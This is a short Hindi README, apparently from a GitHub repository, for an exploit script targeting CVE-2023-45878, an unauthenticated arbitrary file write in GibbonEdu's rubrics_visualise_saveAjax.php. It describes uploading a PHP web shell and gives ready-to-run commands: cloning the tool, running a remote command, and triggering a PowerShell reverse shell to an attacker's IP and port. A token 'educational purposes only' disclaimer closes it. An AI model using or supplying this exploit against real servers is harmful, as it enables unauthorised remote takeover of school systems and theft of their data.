
GibbonEdu मनमाना फ़ाइल लेखन से दूरस्थ कोड निष्पादन
GibbonEdu में मनमानी फ़ाइल लेखन से वेब शेल निष्पादन
इस रिपॉजिटरी में CVE-2023-45878 का शोषण कोड है, जो GibbonEdu में एक मनमानी फ़ाइल लेखन कमजोरी है। यह कमजोरी rubrics_visualise_saveAjax.php एंडपॉइंट को प्रभावित करती है और एक अप्रमाणित हमलावर को वेब सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देती है।
यह स्क्रिप्ट कमजोरी का उपयोग करके PHP वेब शेल अपलोड करती है और या तो:
स्क्रिप्ट दो मोड में काम करती है:
--command (-c): रिमोट पर एक विशिष्ट सिस्टम कमांड निष्पादित करें।--shell (-s): हमलावर के लिसनर पर PowerShell रिवर्स शेल ट्रिगर करें।git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <लक्ष्य_डोमेन> -c "whoami"
python3 CVE-2023-45878.py -t <लक्ष्य_डोमेन> -s -i <आईपी> -p <पोर्ट>
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम पर इस शोषण का अनधिकृत उपयोग अवैध है। लेखक इस शोषण के दुरुपयोग या कारण हुई किसी भी क्षति के लिए जिम्मेदार नहीं है।